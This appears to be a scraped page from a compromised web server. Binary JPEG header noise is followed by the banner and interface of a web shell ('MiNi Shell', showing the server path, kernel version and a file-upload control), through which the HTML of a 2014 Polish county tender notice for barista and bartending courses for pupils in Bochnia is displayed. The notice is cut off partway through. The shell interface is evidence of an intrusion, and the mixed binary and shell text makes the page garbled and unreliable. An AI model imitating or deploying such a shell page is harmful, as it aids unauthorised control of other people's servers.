JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141017/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20141017/346376-N-2014.html

<p class="kh_header"><b>Bochnia: Przeprowadzenie specjalistycznych  kursów zawodowych - 10 zadań w ramach projektu Modernizacja kształcenia zawodowego w Małopolsce realizowanego w ramach Programu Operacyjnego Kapitał Ludzki  - działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego, w latach 2010 - 2014 współfinansowanego z Europejskiego Funduszu Społecznego.</b><br>
<b>Numer ogłoszenia: 346376 - 2014; data zamieszczenia: 17.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu w Bochni , ul. Kazimierza Wielkiego 31, 32-700 Bochnia, woj. małopolskie, tel. 014 6153700, faks 014 6153708.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie specjalistycznych  kursów zawodowych - 10 zadań w ramach projektu Modernizacja kształcenia zawodowego w Małopolsce realizowanego w ramach Programu Operacyjnego Kapitał Ludzki  - działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego, w latach 2010 - 2014 współfinansowanego z Europejskiego Funduszu Społecznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie specjalistycznych kursów zawodowych - 10 zadań w związku z realizacja projektu Modernizacja kształcenia zawodowego w Małopolsce realizowanego w ramach Programu Operacyjnego Kapitał Ludzki - działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego, w latach 2010 - 2014 - które szczegółowo opisano w podziale na poszczególne zadania w załączniku nr 1 do SIWZ.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.03.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W prowadzonym postępowaniu nie wymaga się wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek uważa się za spełniony jeżeli wykonawca w opisanym zakresie oświadczy, że spełnia warunki, dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania dla realizacji niniejszego zamówienia.
Zamawiający dokona oceny spełniania warunku na podstawie złożonego oświadczenia - rozdz. VI ust. 1. pkt. 1</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek uważa się za spełniony jeżeli Wykonawca posiada wiedzę i doświadczenie niezbędne do realizacji zamówienia oraz wykaże się wykonaniem conajmniej 1 usługi (usługa polegająca na na przeprowadzeniu kursów zawodowych) odpowiadającej swoim rodzajem usługą stanowiącym przedmiot niniejszego zamówienia w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia - w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz potwierdzeniem, że te usługi zostały wykonane należycie.
Zamawiający dokona oceny spełniania warunku na podstawie złożonego oświadczenia - rozdz. VI ust.  1 pkt. 1, dokumentu, o którym mowa w rozdz. VI ust. 1 pkt. 2 oraz dowodów dotyczących najważniejszych usług określających, czy zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek uważa się za spełniony jeśli wykonawca oświadczy, że spełnia warunki, dotyczące dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania niniejszego zamówienia - zapewniające wykonanie przedmiotu zamówienia.
Nadto Wykonawca winien wykazać, że dysponuje osobami zdolnymi do wykonania zamówienia. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, iż dysponuje co najmniej jedna osobą, która będzie uczestniczyć w wykonaniu zamówienia w tematyce treści, na którą składa ofertę i posiadającą: 
- wykształcenie co najmniej średnie;
- przygotowanie pedagogiczne; 
- co najmniej 2 letnie doświadczenie w przeprowadzeniu kursów w tematyce i treści, na którą Wykonawca składa ofertę.
Zamawiający dokona oceny spełniania warunku na podstawie złożonego oświadczenia - rozdz. VI ust. 1 pkt. 1 oraz dokumentu, o którym mowa w rozdz. VI ust. 1 pkt. 3</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek uważa się za spełniony jeśli wykonawca oświadczy, że spełnia warunki, dotyczące dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania niniejszego zamówienia - zapewniające wykonanie przedmiotu zamówienia.
Nadto Wykonawca winien wykazać, że dysponuje osobami zdolnymi do wykonania zamówienia. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, iż dysponuje co najmniej jedna osobą, która będzie uczestniczyć w wykonaniu zamówienia w tematyce treści, na którą składa ofertę i posiadającą: 
- wykształcenie co najmniej średnie;
- przygotowanie pedagogiczne; 
- co najmniej 2 letnie doświadczenie w przeprowadzeniu kursów w tematyce i treści, na którą Wykonawca składa ofertę.
Zamawiający dokona oceny spełniania warunku na podstawie złożonego oświadczenia - rozdz. VI ust. 1 pkt. 1 oraz dokumentu, o którym mowa w rozdz. VI ust. 1 pkt. 3</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek uważa się za spełniony jeśli wykonawca oświadczy, że znajduje się w sytuacji  ekonomicznej i finansowej zapewniającej wykonanie przedmiotu zamówienia.
Zamawiający dokona oceny spełniania warunku na podstawie złożonego oświadczenia - rozdz. VI ust.1 pkt. 1</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz oferty - według wzoru jak w załączniku nr 2 do SIWZ wraz z deklaracją o związaniu się ofertą przez wymagany okres 30 dni od upływu terminu na składanie ofert</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wzór umowy stanowi załącznik nr 8 do niniejszej Specyfikacji Istotnych Warunków Zamówienia.
2. Oświadczenie o akceptacji projektu umowy - wynikać będzie z zaparafowania przez Wykonawcę każdej z jej stron i dołączenie do składanej oferty.
3. Zamawiający dopuszcza możliwość zmiany umowy w zakresie:
1) terminu jej realizacji;
2) w związku z koniecznością wprowadzenia zmian będących następstwem zmian wprowadzonych pomiędzy Zamawiającym, a inną niż Wykonawca stroną w tym Instytucją Pośredniczącą oraz Instytucję Pośredniczącą II stopnia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.malopolska.pl/spbochnia<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Bochni ul. Kazimierza Wielkiego 31, 32-700 Bochnia...</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.10.2014 godzina 10:00, miejsce: Starostwo Powiatowe w Bochni ul. Kazimierza Wielkiego 31, 32-700 Bochnia - Punkt Obsługi Mieszkańca..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt - Modernizacja kształcenia zawodowego w Małopolsce realizowanego w ramach Programu Operacyjnego Kapitał Ludzki - działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego, w latach 2010 - 2014 współfinansowanego z Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kurs baristyczny (dla uczniów Specjalnego Ośrodka Szkolno - Wychowawczego w Bochni).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników zajęć - 3 grupy po 5 uczniów Specjalnego Ośrodka Szkolno - Wychowawczego w Bochni

2. Czas trwania kursu wynosi: 20 godzin dla każdej z grup

3. Zamawiający zaleca, aby zajęcia były realizowane po godz.14.00 w dni powszednie oraz w soboty od godz. 8.00 do 14.00. Harmonogram zajęć ustala się w porozumieniu 
z Zamawiającym, który ma prawo do podania własnych terminów odbywania zajęć. 

4. Zadanie polega na przeprowadzeniu kursu baristycznego (dla uczniów Specjalnego Ośrodka Szkolno - Wychowawczego w Bochni). Celem kursu jest zdobycie niezbędnej wiedzy teoretycznej i praktycznej oraz uzyskanie stosownych dyplomów, certyfikatów, potwierdzających posiadanie wiedzy i umiejętności z zakresu objętego kursem. Uczestnicy po zakończonym kursie otrzymają zaświadczenie o ukończeniu kursu, a po pozytywnym zdaniu egzaminu przeprowadzonego przez Wykonawcę uczestnicy uzyskują certyfikat baristyczny I-go stopnia. Program szkolenia zawierający zajęcia teoretyczne z przewagą zajęć praktycznych. W programie powinno się znaleźć minimum: historia kawy, rejony uprawy, gatunki kawy, rozpoznawanie ziaren kaw, sposób zbierania, metody przetwarzania i stopień wypalenia, metody przyrządzania kawy, zasady serwowania kawy, espresso - pojęcie, parametry, zasada 4M, chemia espresso, ustawienie młynka, dozowanie kawy i ubijanie, przygotowanie kawy Espresso, ubijanie mleka, przygotowanie kaw mlecznych, przygotowanie kaw deserowych z dodatkami, czyszczenie ekspresu, wzory lane z ręki, rysowane sosem i szpikulcem. Tematy przedstawiane przez wykładowców na zajęciach powinny być przygotowane i prezentowane tak, aby każdy słuchacz mógł przynajmniej jeden raz w trakcie zajęć samodzielnie wykonać ćwiczenia związane z wykładanym tematem. Zajęcia prowadzone są na surowcach określonych w recepturach.

5. Wykonawca zobowiązany jest przekazać na własność każdemu uczestnikowi kursu co najmniej: zeszyt w formacie A4 w twardej oprawie, długopis, materiały i pomoce dydaktyczne dostosowane do programu kursu oraz teczkę na materiały. 

6. Uczestnicy szkolenia zostaną wskazani przez Zamawiającego. Wykonawca zapewni na swój koszt dla każdego uczestnika kursu: ubezpieczenie od następstw nieszczęśliwych wypadków NW (każda osoba musi być ubezpieczona na kwotę min. 10.000 zł podczas szkolenia, w drodze na szkolenie i ze szkolenia) - co wykaże Zamawiającemu przed rozpoczęciem kursu. 
Wykonawca zapewni catering obejmujący: ciasteczka, paluszki, woda, soki, kawa/herbata.

7. Miejsce kursu Bochnia (Specjalny Ośrodek Szkolno - Wychowawczy w Bochni). Uczestnicy szkolenia zostaną wskazani przez Zamawiającego. Zamawiający zapewnia salę lekcyjną w szkole bez całości sprzętu potrzebnego do przeprowadzenia kursu.

8. Termin realizacji kursu: od dnia podpisania umowy do dnia: grupa 1 - do 19.12.2014 r., grupy 2 i 3 - do 10.03.2015 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kurs baristyczny (dla uczniów Zespołu Szkół nr 3 w Bochni).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników zajęć - 3 grupy po 10 uczniów Zespołu Szkół nr 3 w Bochni

2. Czas trwania kursu wynosi: dla każdej z grup po 20 godzin

3. Zamawiający zaleca, aby zajęcia były realizowane po godz.14.00 w dni powszednie oraz w soboty od godz. 8.00 do 14.00. Harmonogram zajęć ustala się w porozumieniu 
z Zamawiającym, który ma prawo do podania własnych terminów odbywania zajęć. 

4. Zadanie polega na przeprowadzeniu kursu baristycznego (dla uczniów Zespołu Szkół nr 3 w Bochni). Celem kursu jest zdobycie niezbędnej wiedzy teoretycznej i praktycznej oraz uzyskanie stosownych dyplomów, certyfikatów, potwierdzających posiadanie wiedzy i umiejętności z zakresu objętego kursem. Uczestnicy po zakończonym kursie otrzymają zaświadczenie o ukończeniu kursu, a po pozytywnym zdaniu egzaminu przeprowadzonego przez Wykonawcę uczestnicy uzyskują certyfikat baristyczny I-go stopnia. Program szkolenia zawierający zajęcia teoretyczne z przewagą zajęć praktycznych. W programie powinno się znaleźć minimu: historia kawy, rejony uprawy, gatunki kawy, rozpoznawanie ziaren kaw, sposób zbierania, metody przetwarzania i stopień wypalenia, metody przyrządzania kawy, zasady serwowania kawy, espresso - pojęcie, parametry, zasada 4M, chemia espresso, ustawienie młynka, dozowanie kawy i ubijanie, przygotowanie kawy Espresso, ubijanie mleka, przygotowanie kaw mlecznych, przygotowanie kaw deserowych, z dodatkami, czyszczenie ekspresu, wzory lane z ręki, rysowane sosem i szpikulcem. Tematy przedstawiane przez wykładowców na zajęciach powinny być przygotowane i prezentowane tak, aby każdy słuchacz mógł przynajmniej jeden raz w trakcie zajęć samodzielnie wykonać ćwiczenia związane z wykładanym tematem. Zajęcia prowadzone są na surowcach określonych w recepturach.

5. Wykonawca zobowiązany jest przekazać na własność każdemu uczestnikowi kursu co najmniej: zeszyt w formacie A4 w twardej oprawie, długopis, materiały i pomoce dydaktyczne dostosowane do programu kursu oraz teczkę na materiały. 

6. Uczestnicy szkolenia zostaną wskazani przez Zamawiającego. Wykonawca zapewni na swój koszt dla każdego uczestnika kursu: ubezpieczenie od następstw nieszczęśliwych wypadków NW (każda osoba musi być ubezpieczona na kwotę min. 10.000 zł podczas szkolenia, w drodze na szkolenie i ze szkolenia) - co wykaże Zamawiającemu przed rozpoczęciem kursu. 
Wykonawca zapewni catering obejmujący: ciasteczka, paluszki, woda, soki, kawa/herbata.

7. Uczestnicy szkolenia zostaną wskazani przez Zamawiającego. Zamawiający zapewnia salę lekcyjną w szkole bez całości sprzętu potrzebnego do przeprowadzenia kursu.

8. Termin realizacji kursu: od dnia podpisania umowy do dnia: grupa 1 - do 19.12.2014 r., grupy 2 i 3 - do 10.03.2015 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kurs barmański z podstawami sommelier (dla uczniów Specjalnego Ośrodka Szkolno - Wychowawczego w Bochni).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników zajęć - 3 grupy po 5 uczniów Specjalnego Ośrodka Szkolno - Wychowawczego w Bochni

2. Czas trwania kursu wynosi: 16 godzin łącznie

3. Zamawiający zaleca, aby zajęcia były realizowane po godz.14.00 w dni powszednie oraz w soboty od godz. 8.00 do 14.00. Harmonogram zajęć ustala się w porozumieniu 
z Zamawiającym, który ma prawo do podania własnych terminów odbywania zajęć. 

4. Zadanie polega na przeprowadzeniu kursu barmańskiego z podstawami sommelier (dla uczniów Specjalnego Ośrodka Szkolno - Wychowawczego w Bochni). Celem kursu jest zdobycie niezbędnej wiedzy teoretycznej i praktycznej oraz uzyskanie stosownych dyplomów, certyfikatów, potwierdzających posiadanie wiedzy i umiejętności z zakresu objętego kursem. W programie powinno się znaleźć minimum: sylwetka barmana, akcesoria barmańskie, szkło barowe, technologia i towaroznawstwo napojów alkoholowych i bezalkoholowych, napoje mieszane, technika miksowania, receptury napojów, podstawowe zagadnienia z zakresu serwisu win oraz degustacji analitycznej wyselekcjonowanych trunków. Tematy przedstawiane przez wykładowców na zajęciach powinny być przygotowane i prezentowane tak, aby każdy słuchacz mógł przynajmniej jeden raz w trakcie zajęć samodzielnie wykonać ćwiczenia związane z wykładanym tematem. Zajęcia mają być prowadzone na surowcach określonych w recepturach z użyciem dekoracji. Na zakończenie zajęć ma być przeprowadzona profesjonalna degustacja. W czasie trwania kursu powinno być przygotowane minimu 15 drinków.
5. Wykonawca zobowiązany jest przekazać na własność każdemu uczestnikowi kursu co najmniej: zeszyt w formacie A4 w twardej oprawie, długopis, materiały i pomoce dydaktyczne dostosowane do programu kursu oraz teczkę na materiały. 

6. Uczestnicy szkolenia zostaną wskazani przez Zamawiającego. Wykonawca zapewni na swój koszt dla każdego uczestnika kursu: ubezpieczenie od następstw nieszczęśliwych wypadków NW (każda osoba musi być ubezpieczona na kwotę min. 10.000 zł podczas szkolenia, w drodze na szkolenie i ze szkolenia) - co wykaże Zamawiającemu przed rozpoczęciem kursu. 
Wykonawca zapewni catering obejmujący: ciasteczka, paluszki, woda, soki, kawa/herbata.

7. Uczestnicy szkolenia zostaną wskazani przez Zamawiającego. Zamawiający zapewnia salę lekcyjną w szkole bez całości sprzętu potrzebnego do przeprowadzenia kursu.

8. Termin realizacji kursu: od dnia podpisania umowy do dnia: grupa 1 - do 19.12.2014 r., grupy 2 i 3 - do 10.03.2015 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kurs barmański z podstawami flair (dla uczniów Zespołu Szkół nr 3 w Bochni).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników zajęć - 3 grupy po 15 uczniów z Zespołu Szkół nr 3

2. Czas trwania kursu wynosi: dla każdej z grup po 25 godzin

